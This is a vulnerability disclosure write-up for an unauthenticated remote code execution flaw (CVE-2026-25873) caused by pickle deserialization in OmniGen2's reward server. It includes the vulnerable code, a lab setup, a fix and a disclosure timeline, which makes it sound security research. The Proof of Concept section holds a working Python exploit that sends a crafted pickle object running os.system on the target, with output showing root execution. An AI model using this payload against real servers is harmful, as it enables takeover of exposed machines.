OmniGen2: Unauthenticated RCE via Pickle Deserialization in BAAI's Reward Server

Valentin Lobstein

Introduction

While doing a systematic audit of pickle deserialization patterns across popular ML/AI projects on GitHub, I found a critical vulnerability in OmniGen2, a multimodal AI project by BAAI (Beijing Academy of Artificial Intelligence) with 4,000+ stars.

The reward server component, used during reinforcement learning training, calls pickle.loads() directly on HTTP POST bodies without any form of authentication. This gives unauthenticated Remote Code Execution to anyone who can reach the server, which binds to 0.0.0.0 by default.

  • Target: VectorSpaceLab/OmniGen2
  • Stars: 4,000+
  • CVE: CVE-2026-25873
  • Severity: Critical (CVSS 4.0: 9.3)

What is OmniGen2?

OmniGen2 is an open-source multimodal generation model developed by BAAI. It handles text-to-image generation, image editing, and visual understanding. The project includes an RL (Reinforcement Learning) training component called OmniGen2-RL, which uses a distributed reward server architecture to score generated outputs during training.

The reward server infrastructure consists of a proxy server (reward_proxy.py, port 23456) that distributes work to multiple backend workers (reward_server.py, ports 18888+). Both communicate via HTTP with pickle-serialized payloads.

The Vulnerability

The pattern is dead simple. In reward_proxy.py, line 208:

def prepare_request_data(request_body):
    data = pickle.loads(request_body)  # untrusted network input

This function is called from the Flask POST / endpoint at line 224:

@app.route("/", methods=["POST"])
def evaluate():
    ...
    data = prepare_request_data(request.data)

The same pattern exists in reward_server.py at line 118:

def parse_and_validate_request(raw_data):
    data = pickle.loads(raw_data)  # same thing

That’s it. Raw bytes from the network, straight into pickle.loads(). No authentication, no validation, no restricted unpickler. The server binds to 0.0.0.0 by default, making it accessible from any network interface.

Python’s pickle module executes arbitrary code during deserialization via the __reduce__ protocol - an attacker sends a crafted object, and pickle.loads() runs whatever function that object specifies before any other processing happens.
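To make the mechanism concrete, here is a harmless sketch of the same protocol. The class name Demo is made up for illustration, and the callable is the builtin len() rather than anything dangerous. It shows that pickle.loads() calls the function named by __reduce__ and hands back its return value, not an instance of the original class.

```python
import pickle


class Demo:
    """Illustrative class; the name is hypothetical."""

    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call len('abc')".
        return (len, ("abc",))


payload = pickle.dumps(Demo())

# The receiving side does not need Demo to be defined: the payload only
# references the callable (builtins.len) and its arguments.
result = pickle.loads(payload)
print(type(result).__name__, result)  # int 3
```

Swapping len for os.system is the only change needed to turn this into the exploit shown later, which is why pickle.loads() must never see untrusted bytes.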

Proof of Concept

Setting Up the Target

I tested this against the real reward_proxy.py code from the repository, deployed in Docker exactly as the project documents it:

# Docker with real reward_proxy.py and real editscore_7B.yml config
docker run -d --name omnigen2-lab -p 23456:23456 omnigen2-lab

The server starts with:

python reward_proxy.py --config_path server_configs/editscore_7B.yml

The Exploit

import pickle
import os
import requests

class RCE:
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        return (os.system, (self.cmd,))

requests.post('http://target:23456/', data=pickle.dumps(RCE('id > /tmp/pwned')))

Result

$ docker exec omnigen2-lab cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)   # <-- root!

The server returns HTTP 400, which is expected. pickle.loads() executes the malicious payload and returns the result of os.system() (an int). The server then tries to access dict keys on that int, fails, and returns an error. By that point the command has already run: code execution happens inside pickle.loads(), before any validation.
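The ordering can be reproduced locally with a benign payload. This is a sketch only: handle() is a hypothetical stand-in for the real endpoint, the "images" key is an assumed name, and the payload creates an empty directory in a temp folder instead of running a shell command.

```python
import os
import pickle
import tempfile


class Marker:
    """Benign stand-in for the exploit: creates an empty directory."""

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (os.mkdir, (self.path,))


def handle(body):
    """Hypothetical handler shaped like the flow described above."""
    try:
        data = pickle.loads(body)  # the payload's callable runs here
        _ = data["images"]         # assumed key; fails because data is None
    except Exception:
        return 400
    return 200


marker = os.path.join(tempfile.mkdtemp(), "marker")
status = handle(pickle.dumps(Marker(marker)))
print(status, os.path.isdir(marker))  # 400 True
```

The request is rejected, yet the side effect is already on disk, so an error status says nothing about whether the payload ran.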

Both the proxy server (port 23456) and the worker servers (ports 18888+) are vulnerable through the same pattern.

Attack Surface

The deployment architecture makes this particularly concerning:

  • The proxy binds to 0.0.0.0:23456 by default
  • Worker servers bind to 0.0.0.0:18888 (and sequential ports)
  • The deployment scripts (start_multi_machines.sh) use SSH to start servers across multiple hosts, confirming these are meant to be network-accessible
  • No firewall rules, TLS, or authentication tokens are referenced anywhere in the codebase
  • These servers run on GPU nodes, so compromise gives access to expensive compute infrastructure

There’s also a client-side vector: reward_client_edit.py calls pickle.loads(response.content) on server responses, meaning a compromised server could RCE the training clients too.

Suggested Fix

The reward server serializes scores, image paths, and training configs - all representable as JSON. Replace pickle.loads() with json.loads() and add a shared secret in an Authorization header.
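A minimal sketch of that fix, using only the standard library so it stays framework-agnostic. The function name parse_request, the SHARED_SECRET value, and the Bearer scheme are assumptions for illustration, not the project's actual patch. In a Flask handler, headers would be request.headers and body would be request.data.

```python
import hmac
import json

# Hypothetical secret; in practice load it from the environment or a secret store.
SHARED_SECRET = "change-me"


def parse_request(headers, body):
    """Return (status, payload); reject unauthenticated or non-JSON input."""
    supplied = headers.get("Authorization", "")
    expected = f"Bearer {SHARED_SECRET}"
    # compare_digest runs in constant time, so it does not leak how much
    # of the token matched.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 401, None
    try:
        payload = json.loads(body)  # parses data only, never calls code
    except ValueError:              # covers JSONDecodeError and bad encodings
        return 400, None
    if not isinstance(payload, dict):
        return 400, None
    return 200, payload


ok = {"Authorization": "Bearer change-me"}
print(parse_request(ok, b'{"scores": [0.5]}'))  # (200, {'scores': [0.5]})
print(parse_request({}, b'{"scores": [0.5]}'))  # (401, None)
```

Checking the token before parsing means unauthenticated bytes never reach a parser at all, and a pickle payload sent with a valid token is simply rejected as malformed JSON.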

Timeline

  • 2026-02-10: Vulnerability discovered and confirmed via Docker PoC
  • 2026-02-10: Disclosure email sent to vendor (project leads, via the contacts listed on the arXiv paper)
  • 2026-02-10: CVE request submitted to VulnCheck
  • 2026-02-11: CVE-2026-25873 assigned by VulnCheck
  • 2026-03-18: No response from maintainers. Fix PR submitted: #139
  • 2026-03-18: CVE published, write-up disclosed

Takeaways

OmniGen2 is the most straightforward case in this series - HTTP POST body straight into pickle.loads(), running as root in Docker, on a multi-machine deployment with SSH-based orchestration. The client-side vector (deserializing server responses) adds a bidirectional risk: compromise the server, and you compromise every training client that connects to it.